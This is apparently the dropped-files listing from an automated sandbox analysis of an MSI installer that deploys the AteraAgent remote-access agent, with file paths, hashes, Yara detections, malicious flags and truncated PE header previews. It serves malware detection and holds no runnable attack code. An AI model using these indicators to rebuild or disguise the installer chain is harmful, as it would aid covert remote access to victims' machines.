                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIBD86.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIBEDF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSICBCF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSID8C1.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIDBBE.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):435996
                                                                                                                                                                                                                                        Entropy (8bit):6.651601195957652
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:2t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Kse:2zOE2Z34KGzOE2Z34K5
                                                                                                                                                                                                                                        MD5:630728BB55B0B09C19DAD1BCE44EC857
                                                                                                                                                                                                                                        SHA1:1011860A55E59759757EF104802BD7435725D7EC
                                                                                                                                                                                                                                        SHA-256:4EBF2091B2634BFBB31DA43EED63F5675058A1BA8A550367534CE7F0577818EF
                                                                                                                                                                                                                                        SHA-512:66C522E1DC98183CDB518A88046FD452FB2EA413A0A2D680F542049A42D6B1C506F997A12D98A832E678CF3B6F94E8C80FCCACEF161AFD2DE17FEF822F85A7CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDBBE.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@dOBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}....&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}c.&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}............StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P...................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIDBCF.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIDDD3.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSIDF2C.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1739667768203184
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjZSAGiLIlHVRpUh/7777777777777777777777777vDHF7DRONN/Xl0i5:JbSQI5ERRqF6F
                                                                                                                                                                                                                                        MD5:8F4A2611379BD461E5E0783C8CAC9C05
                                                                                                                                                                                                                                        SHA1:2F689104750D0679CDE9321C44D24C1BE739998E
                                                                                                                                                                                                                                        SHA-256:FAA66AC437A84F4FC067EC0D6744A4F9BFF88637423E6A6A6CD63C815B4258A7
                                                                                                                                                                                                                                        SHA-512:1CA6948F2B7B57480EB808AB3E2BF4FC267CB539F9363E7A6E9D0E5D5CFE896DD27AA6B0272412B4BD3F05DCDE05262B7FC9BEC99AFF7BAC04220B7E15160D16
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1754640634326148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72Fj1mSAGiLIlHVRpUh/7777777777777777777777777vDHF2Vt/Xl0i8Q:JuSQI5E2l6F
                                                                                                                                                                                                                                        MD5:5A9D668490742D7540FD57980A0C579F
                                                                                                                                                                                                                                        SHA1:842D327064DFADF39BC9FEE8BA66B651BC6E148D
                                                                                                                                                                                                                                        SHA-256:FD1B2FCCEABD298195FB23A6FCAA4C9842BE0593C55F84AFA31345506E4EDF50
                                                                                                                                                                                                                                        SHA-512:9C6CAC0772C34AE2AC13EF66D7B44ABBB53432FD4F601E259E8CC798C25ECAFAEA0C5C779A705A3328FB7FAA8055D2D73B7DB2B6E491E663AF3DA12E623D959F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.172589133487772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjuAGiLIlHVRpIh/7777777777777777777777777vDHFzTPrfWrl0i8Q:JUQI5wBTr/F
                                                                                                                                                                                                                                        MD5:CFA2CD2FAB0EC5DBB80D33743064900D
                                                                                                                                                                                                                                        SHA1:434FD5BAF2B5282985FE625FECED07073393E1CD
                                                                                                                                                                                                                                        SHA-256:AD77CD7D2801E18D0159C9009D09E41CF324528153FE58C5FA424370E5B0F43C
                                                                                                                                                                                                                                        SHA-512:3E5D7BFEFADC3438C6AC3CBE586D055D00F62866743CC74122DF7DF6BE64FE6ED52596FF31C3B520B1C16A5DCE1EB87859BFE25EC06A42F8D15B4A588CB4422B
